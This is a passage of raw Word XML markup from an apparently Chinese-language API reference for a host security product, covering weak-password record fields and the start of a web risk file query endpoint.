          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAF0F7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08EF772C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5552EFA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unChangePwdDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C093BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF08ABC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7607164D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码未修改天数（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5406BEE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65BB7560" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6392CC06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A9EE74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2D9DAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>账号登录方式：0-不可登录；1-key登录；2-pwd登录；3-key&amp;pwd登录（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2854EFE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21D68195" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>interactiveLoginType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D35E68E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DA9C9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78B73ABA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>账号交互登录方：0/1/2 0-不可登录；1-不可交互登录；2-可交互登录（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B665763" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D842DFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E4F7D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1503A32F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4797F387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码状态：1/2/3/4 1-正常；2-将要失效；3-已经失效；4-已锁定（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">， </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="143D4ED9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10334689" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A25B9E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3458CAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D6AC611" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>第一次发现该弱密码的时间(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EFDA42A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F06980D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B03ED90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30BD61B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C597580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14B46693" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238FB20E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AAE91E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762074C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="562CEE07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定端口(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F1CFF02" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67CFDBAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C2BB0F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23303518" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B7192E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程id(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49C85DBD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366FC2D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7891DCFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ED7A291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01844143" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否root权限运行, true/false 是/否(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19C7A4F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C0F08F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D9552C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A54DCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EA6A2FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否对外访问,true/false 是/否(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71DB16C5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0F9402" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FADDE21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C2F63D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11151BE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>shell登录性：0/1 0-非登录shell；1-登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D057ED2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc115166177"/>
      <w:bookmarkStart w:id="206" w:name="web风险文件"/>
      <w:bookmarkEnd w:id="196"/>
      <w:bookmarkEnd w:id="204"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web风险文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="56DF36D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4806B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc115166178"/>
      <w:bookmarkStart w:id="208" w:name="web风险文件查询结果"/>
      <w:r>
        <w:t>web风险文件查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="023652D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web风险文件数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79145944" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB18623" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61739DA4"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608"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="33C45BA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B738DDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B167011" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D5FDA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A713329" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DD0B25F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFBD7A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8CE2EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DEAA652" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFB53F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="564293AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A57D495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76832B72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
